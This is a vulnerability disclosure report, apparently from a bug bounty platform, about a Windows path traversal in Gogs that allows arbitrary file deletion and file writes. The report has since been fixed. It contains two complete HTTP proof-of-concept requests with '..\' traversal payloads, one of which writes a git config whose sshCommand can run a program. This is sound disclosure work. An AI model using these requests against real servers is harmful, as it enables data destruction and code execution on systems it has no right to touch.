Path traversal leads to arbitrary file deletions and file writes in gogs/gogs

Valid

Reported on

Jun 2nd 2022

Description

Deploy and run gogs in Windows.

Proof of Concept

1.Create a repository in Gogs, upload a file named test to the repository on the web page, The content of the file is as follows:

2.The attacker can remove any files.

http request:

POST /admin1/repo6/_delete/master/..\..\..\../README.md HTTP/1.1 HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=PuAr2ZVY2NpoEOR1se-J81LVboM6MTY1NDAwODAzNDgzNDEwOTAwMA&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

The attacker can set tree_path tree_path=..\..\files.txt to upload any files into any directory.

http request:

POST /admin1/repo6/_edit/master/test HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 722
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=CQ7KgJoDP2oI1xKrj0bx1GtYiQ46MTY1NDAwNzk1MjA5ODk5MTQwMA&last_commit=11e2a5c721b9f9cbe4bb32bcdcc6318794e350ff&tree_path=..\..\..\..\file111&content=%5Bcore%5D%0D%0A++++repositoryformatversion+%3D+0%0D%0A++++filemode+%3D+true%0D%0A++++bare+%3D+false%0D%0A++++logallrefupdates+%3D+true%0D%0A++++ignorecase+%3D+true%0D%0A++++precomposeunicode+%3D+true%0D%0A++++sshCommand+%3D+notepad%0D%0A%5Bremote+%22origin%22%5D%0D%0A++++url+%3D+git%40github.com%3Atorvalds%2Flinux.git%0D%0A++++fetch+%3D+%2Brefs%2Fheads%2F*%3Arefs%2Fremotes%2Forigin%2F*%0D%0A%5Bbranch+%22master%22%5D%0D%0A++++remote+%3D+origin%0D%0A++++merge+%3D+refs%2Fheads%2Fmaster%0D%0A%0D%0A%0D%0A&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

Impact

1.Delete arbitrary files, such as gogs/custom/conf/app.ini

2.Write the files to any path.

We are processing your report and will contact the gogs team within 24 hours. a year ago

A gogs/gogs maintainer has acknowledged this report a year ago

Joe Chen validated this vulnerability a year ago

1135 has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Joe Chen

commented a year ago

Maintainer

Poor Windows...

We have sent a fix follow up to the gogs team. We will try again in 7 days. a year ago

Joe Chen marked this as fixed in 0.12.9 with commit 2ca014 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation